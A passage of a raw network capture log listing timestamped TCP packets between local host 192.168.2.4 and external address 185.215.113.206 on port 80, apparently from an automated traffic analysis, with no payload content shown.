Nov 11, 2024 01:14:15.601291895 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601320982 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601387978 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601399899 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601412058 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601422071 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601434946 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601450920 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601604939 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601624012 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601650000 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601667881 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601681948 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601715088 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601726055 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601763010 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601866007 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601876974 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601887941 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601913929 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601913929 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601932049 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602176905 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602188110 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602197886 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602225065 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602250099 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602250099 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602262974 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602287054 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602338076 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602340937 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602372885 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602401018 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602411985 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602432013 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602433920 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602453947 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602458954 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602473021 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602480888 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602488995 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602509022 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602657080 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602667093 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602684021 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602710962 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602744102 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602754116 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602767944 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602778912 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602794886 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602802992 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602823019 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.602983952 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.602996111 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.603007078 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.603018999 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.603023052 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.603037119 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.603037119 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.603049994 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.603060961 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.603060961 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.603072882 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.603090048 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.603115082 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605401993 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605412006 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605422974 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605443001 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605449915 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605463982 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605500937 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605530024 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605541945 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605551958 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605564117 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605587006 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605617046 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605628014 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605638981 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605638981 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605647087 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605650902 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605664015 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605674028 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605674028 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605684996 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.605705976 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.605712891 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.606348991 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606359959 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606370926 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606383085 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606394053 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606405020 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606410027 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.606410027 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.606417894 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606430054 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606434107 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.606441021 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606453896 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606463909 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606467009 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.606477022 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606484890 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.606488943 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606496096 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.606503010 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.606528997 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.606553078 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.607263088 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607280016 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607290983 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607300997 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607306004 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.607319117 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.607321024 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607333899 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607336998 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.607346058 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607357025 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.607357979 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607371092 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607387066 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.607392073 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.607405901 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.607419968 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.660720110 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.660753965 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.660767078 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.660778999 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.660789967 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.660798073 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.660808086 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.660820961 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.660831928 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.660832882 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.660844088 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.660861015 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.660885096 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.723786116 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.723800898 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.723866940 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755588055 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755651951 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755657911 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755670071 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755681038 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755693913 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755700111 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755707979 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755718946 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755740881 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755757093 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755775928 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755786896 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755800962 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755825996 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755839109 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755850077 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755851984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755872965 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755882025 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755893946 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755903959 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755912066 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755916119 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755922079 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755929947 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755934000 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755947113 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755959034 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755959034 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755970955 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.755980015 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755980015 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.755990028 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756000042 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756001949 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756015062 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756017923 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756040096 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756062984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756072998 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756073952 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756092072 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756092072 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756103992 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756112099 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756117105 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756123066 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756130934 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756143093 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756155014 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756165981 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756166935 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756182909 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756196976 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756206989 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756216049 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756218910 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756237984 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756257057 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756279945 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756283998 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756302118 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756319046 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756333113 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756347895 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756350994 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756369114 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756369114 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756380081 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756390095 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756392002 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756401062 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756414890 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756418943 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756428957 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756441116 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756444931 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756459951 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756463051 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756490946 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756515026 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756551981 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756562948 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756573915 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756592035 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756597042 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756603003 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756608963 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756627083 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756630898 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756640911 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756644011 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756663084 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756686926 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756712914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756722927 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756738901 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756750107 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756755114 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756758928 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756771088 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756777048 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756788015 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756807089 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756820917 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756824970 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756838083 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756849051 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756858110 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756861925 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756872892 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756877899 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756908894 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756917000 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756937027 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756952047 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756957054 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756968021 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756988049 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.756994009 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.756999969 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757008076 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757013083 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757025003 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757045984 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757052898 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757062912 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757066011 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757101059 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757157087 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757169008 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757179976 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757190943 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757196903 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757200956 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757237911 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757298946 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757308960 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757353067 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757364035 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757375002 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757386923 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757410049 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757553101 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757565975 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757576942 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757591963 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757595062 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757607937 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757617950 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757625103 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757632017 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757642984 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757642984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757663965 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757668972 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757680893 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757693052 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757707119 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757740974 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757802963 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757841110 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757910967 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757921934 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757940054 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757950068 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757958889 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757961988 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.757972956 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757983923 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.757993937 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758022070 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758025885 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758025885 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758025885 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758033037 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758037090 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758050919 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758060932 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758069038 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758080006 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758090973 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758091927 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758111000 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758119106 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758125067 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758131027 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758136034 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758147001 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758158922 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758171082 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.758196115 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.758200884 CET	49753	80	192.168.2.4	185.215.113.206
